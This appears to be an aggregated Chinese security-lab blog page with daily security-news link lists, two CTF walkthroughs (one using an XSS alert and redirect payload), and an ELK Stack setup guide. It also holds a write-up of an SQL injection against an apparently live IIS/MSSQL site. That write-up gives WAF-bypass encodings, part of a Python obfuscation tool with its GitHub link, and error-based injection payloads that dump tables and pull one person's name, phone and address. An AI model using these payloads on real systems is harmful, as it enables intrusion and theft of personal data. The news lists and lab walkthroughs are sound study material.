免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、苹果添加“ BlastDoor”以保护iPhone免受零点击攻击 https://www.securityweek.com/apple-adds-blastdoor-secure-iphones-zero-click-attacks 2、微软过去1年中安全业务相关收入超过100亿美金 https://www.securityweek.com/microsoft-security-10-billion-business 3、苹果将在春季推出新的隐私控制措施 https://www.securityweek.com/apple-crack-down-tracking-iphone-users-early-spring 4、新的Android恶意软件Oscorp针对意大利用户 https://securityaffairs.co/wordpress/113983/malware/oscorp-android-malware.html 5、爆炸雪松APT小组入侵全球电信、托管服务商 https://securityaffairs.co/wordpress/113975/apt/lebanese-cedar-apt-attacks.html 6、Stack Overflow披露了2019年被黑事件详情 https://stackoverflow.blog/2021/01/25/a-deeper-dive-into-our-may-2019-security-incident/ 7、研究人员发现新型网络钓鱼工具包LogoKit https://threatpost.com/logokit-simplifies-office-365-sharepoint-login-phishing-pages/163430/ 8、TeamTNT使用新逃避检测工具投送恶意软件 https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool 9、安全研究员发现Node.js应用程序远程执行代码漏洞 https://portswigger.net/daily-swig/potential-remote-code-execution-vulnerability-uncovered-in-node-js-apps 10、Windows 7 仍易受Blind TCP/IP 劫持攻击 https://portswigger.net/daily-swig/blind-tcp-ip-hijacking-is-resurrected-for-windows-7

本关实验地址为：& 预备知识 HTTP协议，报文的组成部分等，请参考https://yijinglab.com/expc.do?ec=ECID172.19.104.182015121711544400001<>以及简单的js脚本编写能力。 打开服务器上的网页然后看到进入第一关的按钮，点一下。 跳到第一关，只有一些文字，那么我们不多BB，直接查看源代码。 源代码中有个注释，要删除1.php.bak，我们直接在地址栏中输入试试。 然后来到了这个页面，和第一关的页面差不多，但是多了一些奇怪的符号，还是看一下源代码吧。 源代码中给出了第二关的地址，直接访问。 进入到第二关后，出来一个输入框和按钮，然后提示点击进入第三关，那么我们点一下 出现了诡异的提示，我们注意到第三关的页面是3rd.php。点击提示的确定后，又退回到第二关了。 此事必有蹊跷。特别是这个输入框，能让我有插它的冲动，写个alert看看能不能xss。 <script>alert(1)</script> 竟然弹框了，好激动好兴奋的样子。 那么我们构造一个a标签来戳进去。<a href="3rd.php"></a> 发现不行，构造出的连接闪一下就没了。 那么我们用【某种方式】重定向吧。 <script>window.location="3rd.php"</script> 成功绕过验证，点击就能进入下一关了。 这和前面也差不多，就是只有一些文字。查看源代码也没有收获，那我们看看能否从文字中获得关键信息 既然说是在眼皮底下，那我们就看看眼皮吧，查看一下HTTP原始请求包和返回包，发现在返回的报文中有个Next字段，提供了下一关的页面。             那么按照提示，点完按钮就结束了吧。 可是鼠标放到按钮上，按钮就不见了。 我们使用审查元素看一下，原来使用了display:none，将其改为display:block按钮就出来了。 但是鼠标悬停还是没有了，看一下上面的joy脚本，原来就是这个脚本隐藏了按钮。 那么我们删除这个按钮的onmouseover="joy()"，果然出现  点击按钮，找到key。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、欧美执法部门联合宣布对NetWalker Ransomware采取行动 https://securityaffairs.co/wordpress/113944/cyber-crime/netwalker-ransowmare-dismantled.html 2、国际联合行动捣毁了Emotet僵尸网络 https://securityaffairs.co/wordpress/113933/cyber-crime/emotet-global-takedown.html 3、Pwn2Own 2021 提供超过150万美元的现金和其他奖品 https://www.securityweek.com/pwn2own-2021-hackers-offered-200000-zoom-microsoft-teams-exploits 4、Linux Sudo中堆缓冲区溢出漏洞可使普通用户获得root特权 https://securityaffairs.co/wordpress/113900/hacking/sudo-vulnerability-cve-2021-3156.html 5、研究人员披露了ADT的LifeShield DIY视频门铃漏洞 https://threatpost.com/adt-security-camera-flaw-opened-homes-stores-to-eavesdropping/163378/ 6、CISA发布有关富士电机HMI产品的高严重漏洞通报 https://www.securityweek.com/cisa-issues-advisory-high-severity-vulnerabilities-fuji-electric-hmi-products 7、零售巨头Dairy Farm遭REvil勒索软件攻击 https://www.bleepingcomputer.com/news/security/pan-asian-retail-giant-dairy-farm-suffers-revil-ransomware-attack/ 8、Nefilim勒索软件利用目标已故员工账户进行攻击 https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/ 9、超过1.76亿巴基斯坦手机用户信息在黑客论坛上出售 https://www.hackread.com/pakistani-mobile-phone-users-database-sold-online/ 10、上百工业组织在SolarWinds攻击中感染了Sunburst恶意软件 https://www.securityweek.com/hundreds-industrial-organizations-received-sunburst-malware-solarwinds-attack

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Firefox阻止Supercookies以改善用户隐私 https://www.securityweek.com/firefox-cracks-down-supercookies-improve-user-privacy 2、苹果发布了针对iOS零日漏洞的紧急修复程序 https://www.securityweek.com/apple-ships-emergency-fixes-under-attack-ios-zero-day 3、更多网络安全公司确认被SolarWinds Hack攻击 https://www.securityweek.com/more-cybersecurity-firms-confirm-being-hit-solarwinds-hack 4、NAT Slipstreaming 2.0可远程攻击内网的设备 https://www.securityweek.com/nat-slipstreaming-20-exposes-devices-internal-networks-remote-attacks 5、DanaBot恶意软件在消失七个月后重新活跃 https://threatpost.com/danabot-malware-roars-back/163358/ 6、思科DNA中心高危漏洞使企业易受到远程攻击 https://threatpost.com/cisco-dna-center-bug-remote-attack/163302/ 7、VIPGames泄漏2300万条玩家记录 https://threatpost.com/gamer-records-exposed-vipgames-leak/163352/ 8、APT组织Lazarus针对安全研究人员进行社工攻击 https://securityaffairs.co/wordpress/113855/apt/north-korea-security-experts.html 9、起重机制造商Palfinger遭遇全球网络攻击 https://www.bleepingcomputer.com/news/security/leading-crane-maker-palfinger-hit-in-global-cyberattack/ 10、Nvidia修复Jetson产品中的高危DoS漏洞 https://threatpost.com/nvidia-squashes-high-severity-jetson-dos-flaw/163360/

本次实验操作地址：& 进入实验环境，打开题目地址，发现是个俄罗斯方块的游戏，尝试先玩了几局，但是并没有什么用，玩游戏就能获得flag？感觉不太靠谱，看看有没有别的思路。 我们先分析这个游戏服务，这是一个web的游戏，那么我们在浏览器的开发者工具中，对网络请求进行分析，发现我们对目标进行访问时，并没有实质性的后台请求： 所以基本可以断定，这是一个前台页面的游戏，游戏的运行、计分都是由js脚本来支持的，所以我们找到了请求中仅有的js页面代码： 这个js混淆过，所以需要先美化，也就是js代码的格式化。经过分析，会发现，当游戏分数达到既定的条件时，js代码会在页面的头部中添加urlkey字段，值为“webqwer”[1]+“100.js”，即为“webqwer”的第2个字母与“100.js”拼接为“e100.js”。 也是一个js文件，我们尝试直接访问，可以下图下图所示的内容，这是jsfuck编码： jsfuck编码是可以直接在控制台运行的，我们复制粘贴到控制台，但是我们直接可以用google浏览器，f12打开开发者工具，然后将编码粘贴到console中，内容过多，环境可能卡顿，耐心等待： 粘贴完成之后，回车就可运行，页面就会弹出flag： 最后填写一下答案，完成。

前言 最近在准备找工作,有一家公司给我发来了这样一条消息,于是有了这篇文章. 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015060916565800001  （本实验以PHP和mysql为环境，简单展示了SQL的发生原理和利用过程，通过显错注入和盲注的对比，更直观展现注入的不同利用方法。） 因本文是bypass成功后,才写的可能会缺少一些图.(耗费本菜鸡半天时间,因为之前都是mysql搞的多,还有就是sqlmap一把梭.差点把传统手艺都丢了.) 大意了,没有闪 拿到目标后,我就迫不及待的直接打开 打开地址一看是报错的,我还以为任务是需要通过信息收集拿到shell,最后再拿数据.我还在想开局就送个信息泄漏? 最后折腾一番之后发现没什么突破口.回来再看之前的地址发现又能访问了. 大意了,没有闪 最后看到界面是这样的(能打开完全靠运气,特别是在晚上) 看到这个界面后,我就知道,原来是想测老夫的sql注入? 我当时心想不会用sqlmap一把梭就进去了吧! 注入点识别 随即我就先用'试试注入点 /1.aspx?id=1%27 继续试试and 1=1 /1.aspx?id=1%20%27and%201=1 好小子,居然有狗小小的一条就能难到我?打开burp,开始手注 bypass宝塔+安全狗 直接把请求改为post,试试垃圾数据填充能不能bypass 生成垃圾数据 好小子,还有个宝塔waf,看来垃圾数据填充已经不好用了 再试试分块传输bypass 还是一样(对分块传输没什么研究,和一些数据库特性结合应该还是可以用的,不是本文的重点) 接下来,开始fuzz 试试不带select 发现可以,继续试试,user和db_name() 这说明宝塔和狗都是对select 后面跟值进行拦截 我们继续试试联合查询union 不出所料还是一样,这两兄弟好搭档啊,换着来.由于本文重点是在学习手注入和bypass下面开始bypass,我这边打算写个payload混淆工具bypass 在写工具前我们得知道bypass的常用手法有哪些吧? 我这边大概整理了有如下几种 利用服务器特性 利用数据库特性 利用WAF特性 所以为了更好的bypass,我们就得了解对这些特性有一定的了解,因为我的当前目标是iis+aspx,那我们就得了解一下iis和mssql特性来进行bypass iis特性 下面摘自 bypass大佬的waf攻防实战笔记 1、%特性(ASP+IIS) 在asp+iis的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能解析出来 的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。 Ps.此处猜测可能是iis下asp.dll解析时候的问题,aspx+iis的环境就没有这个特性。 2、%u特性(asp+iis和aspx+iis) Iis服务器支持对于unicode的解析,例如我们对于select中的字符进行unicode编码,可以得到如下的 s%u006c%u0006ect ,这种字符在IIS接收到之后会被转换为select,但是对于WAF层,可能接收到的内容还是 s%u006c%u0006ect,这样就会形成bypass的可能。 3、另类%u特性(ASP+IIS) 该漏洞主要利用的是unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现: 多个widechar会有 可能转换为同一个字符。 打个比方就是譬如select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e。s%u0065lect->select s%u00f0lect->selectWAF层可能能识别s%u0065lect的形式,但是很有可能识别不了s%u00f0lect的形式。这样就可以利用起来做WAF的绕过。常见三个关键字(union+select+from)的测试情况: s%u0045lect = s%u0065lect = %u00f0lectu --> %u0055 --> %u0075n -->%u004e --> %u006ei -->%u0049 --> %u0069o -->%u004f --> %u006f -->%u00bas -->%u0053 --> %u0073l -->%u004c --> %u006ce -->%u0045 --> %u0065-->%u00f0c -->%u0043 --> %u0063t -->%u0054 -->%u0074 -->%u00de -->%u00fef -->%u0046 -->%u0066r -- mssql特性 空白字符 Mssql可以利用的空白字符有(需要在字符前面加%): 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 注释符 注释符可以用来代替空格,或者和--配合使用,--也可以配合%0a(注释加换行) /**/--/**anything*/ 特殊数值 一般用在注入点上 如1.1或者1E0这些 运算符 下面摘自 404大佬的MSSQL_SQL_BYPASS_WIKI +   加法运算-   减法运算*   乘法运算/   除法运算，如果两个表达式值都是整数，那么结果只取整数值，小数值将略去%   取模运算，返回两数相除后的余数 &   位与逻辑运算，从两个表达式中取对应的位。当且仅当输入表达式中两个位的值都为1时，结果中的位才被设置为1，否则，结果中的位被设置为0|   位或逻辑运算，从两个表达式中取对应的位。如果输入表达式中两个位只要有一个的值为1时，结果的位就被设置为1，只有当两个位的值都为0时，结果中的位才被设置为0^   位异或运算，从两个表达式中取对应的位。如果输入表达式中两个位只有一个的值为1时，结果中的位就被设置为1；只有当两个位的值都为0或 当我们了解完这些特性之后,直接开干,随即就打开了老夫的pycharm 下面直接省略测试过程的图片,大家可以手工测也可以用intruder来跑.fuzz是个漫长的过程,我这里只可以大家提供思路 先把空白字符和注释定义出来(经测试发现+也有同等效果) 1.先把所有的空格都用注释替换 2.对and和where进行处理,在它们前后随机加空白符,用来混淆这两个关键字 3.利用iis特性对下面这几个关键字某个字符用unicode编码替换 4.对下面这几个符合进行处理, 1.在某些函数会被拦截用+()来bypass 2.查询某某库的某某表如admin.user会被拦截,用+.来bypass 5.最后拓展下payload接收.最终代码如下 import random def bypass(payload):    chars1 = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0A', '%0B', '%0C', '%0D', '%0E', '%0F',              '%10', '%11','%12', '%13', '%14', '%15', '%16', '%17', '%18', '%19', '%1A', '%1B', '%1C', '%1D', '%1E',              '%1F', '%20']     已经打包上传github 地址:https://github.com/safe6Sec/bypassWAF 然后就可以愉快的手注了 mssql手注 从前期的来看,该注入点支持union注入和报错注入.我这边采用报错注入. 用union注入需要知道当前表有几列(和mysql一样用order by判断),还需要回显点 用报错注入主要是用top命令配合not in来进行注入 爆库(mssql默认有四个库,我们需要加个条件,dbid>4) and (SELECT top 1 Name FROM Master..SysDatabases where dbid>4)>0 这样只是爆出第一个库,爆别的还需用not in来配合排除已知的表 用union联合查询结果如下(列数量要和当前表一致,没有的列用null占位) union SELECT null,null,null,Name,null,null,null,null FROM Master..SysDatabases 从上面的数据可以看出,只有一个数据库 继续爆表 and (select top 1 name from a999.sys.all_objects where type='U' AND is_ms_shipped=0)>0 第一张表为a999,用not in排除这张表继续爆其他的 and (select top 1 name from a999.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('a999'))>0 以此内推 最后得了下面这些表 'dtproperties','a999','wap_album','wap_albumre','admin','wap_bankLog','wap_bbs','wap_bbs_MarkSix','wap_bbs_MarkSix_bet','D99_CMD','temp','wap_background' 直觉告诉我数据很有可能是在a999(从名字上判断) 直接爆字段,和爆表一样的操作 and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'a999') ) 得到了这些字段 'id','siteid','airplaneid','airplanename','userid','username','num','tel','address','starttime','content','remark','addtime','state' 他们要的数据是:序号10的 那栏信息。包含 名字 电话 地址 开始跑数据 and 1=(select top 1 username from a999 where id=10) 然后继续把剩下的电话地址跑出来,上交收工. fuzz真是挺废时间了,本文是在bypass成功后所写.过程耗费太多时间没截图,思路都告诉大家了.结合起来用即可. 或者会有大佬想说为什么不,写个tamper来跑, 最后感谢404和bypass大佬的文章,小弟受益良多. 总结 不要光说不做,实操才是真理 对waf的bypass也就那样,把规则搞清楚了就很简单,免杀也如此 union注入比报错注入香多了

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、勒索软件攻击了WestRock的 IT和OT系统 https://securityaffairs.co/wordpress/113843/malware/westrock-ransomware.html 2、挖矿僵尸网络DreamBus针对Linux服务器 https://securityaffairs.co/wordpress/113832/malware/dreambus-botnet-linux-servers.html 3、新Dovecat恶意软件针对QNAP设备 https://cyware.com/news/qnap-network-devices-targeted-by-new-dovecat-malware-950680eb 4、Matrikon OPC产品存在严重漏洞 https://www.securityweek.com/industrial-firms-informed-about-serious-vulnerabilities-matrikon-opc-product 5、CrowdStrike披露Windows NTLM漏洞详细信息 https://www.securityweek.com/crowdstrike-discloses-details-recently-patched-windows-ntlm-vulnerability 6、网络钓鱼者伪造Office 365密码过期报告盗取C-Suite凭证 https://www.securityweek.com/phishers-target-c-suite-fake-office-365-password-expiration-reports 7、Shazam应用漏洞暴露Android和iOS用户的位置 https://www.hackread.com/shazam-vulnerability-exposed-android-ios-users-location/ 8、荷兰警方逮捕了两名非法出售COVID-19患者数据的人 https://securityaffairs.co/wordpress/113846/cyber-crime/covid-19-patient-data-sale.html 9、服装品牌Bonobos通知用户数据泄露 https://www.securityweek.com/clothing-brand-bonobos-informs-users-data-breach 10、SonicWall称攻击可能利用了SMA 100产品中的零日漏洞 https://threatpost.com/sonicwall-breach-zero-days-in-remote-access/163290/

https://www.yijinglab.com/expc.do?ec=5e8b5d22-88eb-4061-a07f-80bd791f0b8d （通过本实验的学习，你能够了解主机安全软件监控原理，学会如何利用主机安全软件狙剑监控可疑进程，学会如何利用狙剑软件对本机进行注册表和文件的管理。） 0x、概述! ELK Stack即以前的Elastic Stack，Elk Stack是Elastic公司专门为集中化日志管理设计的免费开源软件组合。它允许搜索、分析和可视化来自不同来源的日志。 如在ubuntu上安装配置ELK Stack，需要如下先决条件： Ubuntu 20.04 最好使用Root 权限进行配置 0x1 内容目录 ELK Stack 组成部分 安装 Java 和所有依赖项 安装和配置 Elasticsearch 安装和配置 Logstash 安装和配置 Kibana 安装和配置 Nginx 安装和配置 Filebeat 配置 Linux 日志到 Elasticsearch 在Kibana中创建日志仪表板 监控 SSH 事件   0x2 ELK Stack 组成 1、Elasticsearch：Elasticsearch是一个基于Apache Lucene(TM)的开源搜索引擎，使用RESTful API，可以存储、检索数据。 2、Logstash：Logstash是一个开源的数据收集引擎，可以采集不同数据源的数据发送给Elasticsearch 3、Kibana：用于分析和可视化日志的 Web可视化平台 4、Filebeat：轻量级的日志收集和转发器，可以把数据收集后转发到Logstash或Elasticsearch 0x3 安装 Java 和所有依赖项 Elasticsearch是Java编写的程序，所以需要安装JDK，可以使用如下命令安装OpenJDK和其他一些所需的软件包。 sudo apt install -y openjdk-14-jdk wget apt-transport-https curl 然后导入Elasticsearch的公钥，添加apt软件源 wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - 添加软件源 0x4 安装和配置Elasticsearch 更新软件源 sudo apt update 然后安装(国内安装比较慢，请耐心等待) sudo apt-get install elasticsearch 安装完后，开始配置Elasticsearch Elasticsearh默认监听9200端口。为了安全，需要设置一下限制外网访问。使外部网络无法通过REST API访问数据和elastic集群。Elasticsearch的配置文件是elasticsearch.yml。修改它就行。 打开配置文件 sudo gedit /etc/elasticsearch/elasticsearch.yml 找到监听接口和端口进行修改 删掉前面的注释符号#改成如下的样子： 保存，然后启动Elasticsearch服务 sudo systemctl start elasticsearch 查看服务状态和验证是否已经启动 sudo systemctl status elasticsearch curl -X GET localhost:9200 看到这个，就说明Elasticsearch启动成功了。 你也可以在浏览器里面访问https://localhost:9200查看 0x5 安装和配置Logstash 首先确保系统里面有openssl，然后安装Logstash openssl version -a sudo apt install logstash -y 创建一个SSL证书用于保证Rsyslog 和Filebeat传输数据给Logstash时的安全性。 在Logstash的配置文件目录下创建一个ssl的目录，然后生成证书 sudo mkdir -p /etc/logstash/ssl cd /etc/logstash sudo openssl req -subj '/CN=elkmaster/' -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout ssl/logstash-forwarder.key -out ssl/logstash-forwarder.crt 为了方便后续配置，我们可以修改一下/etc/hosts文件。把主机的ip配置一个主机名 然后我们需要配置三个文件，分别是用于从filebeat接收数据的filebeat-input.conf，用于过滤系统日志的过滤器配置文件syslog-filter.conf，以及用于输出数据到elasticsearch的output-elasticsearch.conf。 在logstash配置目录创建filebeat-input.conf文件 cd /etc/logstash/ sudo gedit conf.d/filebeat-input.conf 添加如下内容： input { beats { port => 5443 type => syslog ssl => true ssl_certificate => "/etc/logstash/ssl/logstash-forwarder.crt" ssl_key => "/etc/logstash/ssl/logstash-forwarder.key" } } 然后创建过滤器配置文件syslog-filter.conf并采用grok过滤器，这个的作用就是让Logstash根据给出的规则提取数据。 sudo gedit conf.d/syslog-filter.conf 输入如下内容： filter { if [type] == "syslog" { grok { match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" } add_field => [ "received_at", "%{@timestamp}" ] add_field => [ "received_from", "%{h 然后创建一个output-elasticsearch.conf配置文件用于将数据传输给elasticsearch。 sudo gedit conf.d/output-elasticsearch.conf 内容如下： output {   elasticsearch { hosts => ["localhost:9200"]     hosts => "localhost:9200"     manage_template => false     index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}"     document_type => "%{[@metadata][type]}"   } } 配置文件弄好之后，启动logstash服务看是否正常。 sudo systemctl start logstash sudo systemctl status logstash 没有报错，说明服务正常启动了。 0x6 安装和配置Kibana 安装Kibana也是通过apt即可完成 sudo apt install kibana 安装完成之后，我们设置一下kibana的配置文件 sudo gedit /etc/kibana/kibana.yml 主要是修改监听端口和地址，以及elasticsearch的地址 保存，然后启动kibana服务 然后你可以直接在浏览器中访问它 0x7 安装和配置Nginx 安装这个主要是给Kibana做反向代理的。 首先安装Nginx和Apache2-utlis sudo apt install nginx apache2-utils -y 安装完成之后，创建kibana虚拟主机配置文件 sudo gedit /etc/nginx/sites-available/kibana 内容如下： server { listen 80; server_name localhost; auth_basic "Restricted Access"; auth_basic_user_file /etc/nginx/.kibana-user; location / { proxy_pass https://localhost:5601; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection 'upgrade'; proxy_set_header Host $host; 给配置文件创建一个连接 sudo ln -s /etc/nginx/sites-available/kibana /etc/nginx/sites-enabled/  然后给访问Kibana Dashboard配置一个基础身份认证 sudo htpasswd -c /etc/nginx/.kibana-user elastic 然后测试Nginx配置文件并启动服务 sudo nginx -t sudo systemctl restart nginx 0x8 安装和配置Filebeat 下载filebeat然后安装 下载地址：https://www.elastic.co/cn/downloads/beats/filebeat 可以按照自己的需求进行下载 我们这里是安装在Ubuntu上，所以选择DEB版本下载。当然也可以直接用apt安装，前提是你在之前添加了Elastic的软件源。可以看官方指南进行添加软件源：https://www.elastic.co/guide/en/beats/filebeat/7.10/setup-repositories.html#_apt sudo apt install filebeat -y 然后编辑filebeat的配置，配置文件的路径： /etc/filebeat/filebeat.yml 首先把input部分改为true 然后修改Elasticsearch output部分 修改成如下配置：（根据你的实际情况进行设置） 修改Kibana配置部分： 修改完后保存。 然后初始化filebeat sudo filebeat setup 复制之前生成的logstash-forwarder.crt证书到/etc/filebeat目录中 sudo cp /etc/logstash/ssl/logstash-forwarder.crt /etc/filebeat/  然后启动filebeat服务 sudo systemctl start filebeat 0x9 配置 Linux 日志到 Elasticsearch 配置rsyslog到Logstash，然后这些日志会自动传输到Elasticsearch 在配置日志到Logstash之前，我们首先需要配置Logstash到Elasticsearch之间的日志转发。 在/etc/logstash/conf.d目录下创建一个配置文件来设置到Elasticsearch之间的日志转发。 cd /etc/logstash/conf.d/ sudo gedit logstash.conf 配置文件的内容如下： input {   udp {     host => "127.0.0.1"     port => 10514     codec => "json"     type => "rsyslog"   } }                                                                                            # The Filter pipeline stays empty here, no formatting is done. filter { }                         # Eve 配置文件主要由三部分组成，input部分：定义日志从哪儿来，filter部分：日志过滤器，output部分：日志传输到什么地址。 然后我们重启一下logstash服务 sudo systemctl restart logstash 然后配置从rsyslog到Logstash日志转发，rsyslog可以使用模板转换日志然后进行转发。 为了让 rsyslog 转发日志，需要在/etc/rsylog.d目录中创建一个70-output.conf的配置文件。 cd /etc/rsyslog.d/ sudo gedit 70-output.conf 添加如下内容： *.*                         @127.0.0.1:10514;json-template 意思是所有日志发送到127.0.0.1:10514并使用json格式的模板进行转换 我们需要创建一个json格式的模板文件 sudo gedit 01-json-template.conf 内容如下： template(name="json-template"   type="list") {     constant(value="{")       constant(value="\"@timestamp\":\"")     property(name="timereported" dateFormat="rfc3339")       constant(value="\",\"@version\":\"1")       constant(value="\",\"message\":\"")     property(name="msg" format="json")       c  然后启动rsyslog服务 sudo systemctl start rsyslog 检查logstash监听端口是否正常： ss -na | grep 10514 如果监听没成功，并且在日志中看到以下报错信息： 是因为配置文件里面存在语法错误，ELK软件对配置文件的语法要求比较严格，请仔细检查。 0x10 在Kibana中创建日志仪表板 在浏览器中打开Kibana界面 首先需要创建一个索引模式 然后找到Stack Management---Kibana中的Index Patterns 然后点击Create index pattern 输入logstash-*，然后点击Next step 然后时间过滤器我们选择@timestamp 然后点击Create index pattern 添加成功后是这样的： 点击回到Kibana的Discover中，在这里可以查询搜索你的数据 0x11 监控 SSH 事件 在过滤条件中，我们设置过滤条件为programename:sshd* 这样就可以看到sshd程序相关事件了。 0x12 更多参考资料 配置 SSL、TLS 以及 HTTPS 来确保 Elasticsearch、Kibana、Beats 和 Logstash 的安全 | Elastic Blog https://www.elastic.co/cn/blog/configuring-ssl-tls-and-https-to-secure-elasticsearch-kibana-beats-and-logstash 如何使用 Elastic Stack 监测 Nginx Web 服务器 | Elastic Blog https://www.elastic.co/cn/blog/how-to-monitor-nginx-web-servers-with-the-elastic-stack

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、网络安全公司SonicWall内部系统遭协同攻击 https://thehackernews.com/2021/01/exclusive-sonicwall-hacked-using-0-day.html 2、英国政府资助的笔记本电脑存在Gamarue病毒 https://www.hackread.com/uk-govt-funded-laptops-homeschoolers-gamarue-malware/ 3、勒索软件攻击者发布苏格兰环境保护局文件 https://threatpost.com/attackers-publish-private-scottish-gov-files/163254/ 4、英特尔未发布财务数据遭泄露 https://www.securityweek.com/chipmaker-intel-corp-blames-internal-error-data-leak 5、200万MyFreeCams用户数据在黑客论坛出售 https://securityaffairs.co/wordpress/113734/data-breach/myfreecams-data-breach.html 6、Edge添加了密码生成器删除了对Flash，FTP的支持 https://www.securityweek.com/microsoft-edge-adds-password-generator-drops-support-flash-ftp 7、特斯拉起诉前雇员涉嫌窃取敏感文件 https://securityaffairs.co/wordpress/113808/cyber-crime/tesla-sues-former-employee.html 8、KindleDrip漏洞–通过电子邮件入侵Kindle设备 https://securityaffairs.co/wordpress/113743/hacking/kindle-kindledrip-exploit.html 9、约会网站MeetMindful 228万用户数据在黑客论坛上泄漏 https://securityaffairs.co/wordpress/113803/uncategorized/meetmindful-data-leak.html 10、Drupal发布关键漏洞修复程序 https://www.bleepingcomputer.com/news/security/drupal-releases-fix-for-critical-vulnerability-with-known-exploits/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Microsoft发布SolarWinds供应链攻击详细报告 https://www.securityweek.com/microsoft-details-opsec-anti-forensic-techniques-used-solarwinds-hackers 2、思科修复了SD-WAN，DNA中心，SSMS产品中的关键漏洞 https://www.securityweek.com/cisco-patches-critical-vulnerabilities-sd-wan-dna-center-ssms-products 3、SAP Solution Manager严重漏洞利用程序公开 https://www.securityweek.com/scanning-activity-detected-after-release-exploit-critical-sap-solman-flaw 4、Dovecat恶意软件针对QNAP NAS设备进行挖矿 https://securityaffairs.co/wordpress/113710/malware/qnap-dovecat-malware.html 5、网络钓鱼活动盗取的数千公司员工的凭据在线泄露 https://securityaffairs.co/wordpress/113705/hacking/phishing-stolen-pwd-google-search.html 6、FIN11攻击者正在使用Clop勒索软件 https://cyware.com/news/fin11-attackers-are-now-using-clop-ransomware-6be5cedc 7、黑客在论坛泄露7700万Nitro PDF用户记录 https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/ 8、安全厂商发现三个发布到npm的恶意软件包 https://blog.sonatype.com/cursedgrabber-strikes-again-sonatype-spots-new-malware-campaign-against-software-supply-chains 9、数字货币交易所BuyUCoin 32.5万用户的敏感数据泄露 https://ciso.economictimes.indiatimes.com/news/key-data-of-over-3-25-lakh-indian-users-leaked-in-buyucoin-hack/80387325 10、网络诈骗者发送虚假工作机会以获取银行信息 https://www.vice.com/en/article/3an74y/scammers-are-sending-fake-job-offers-on-linkedin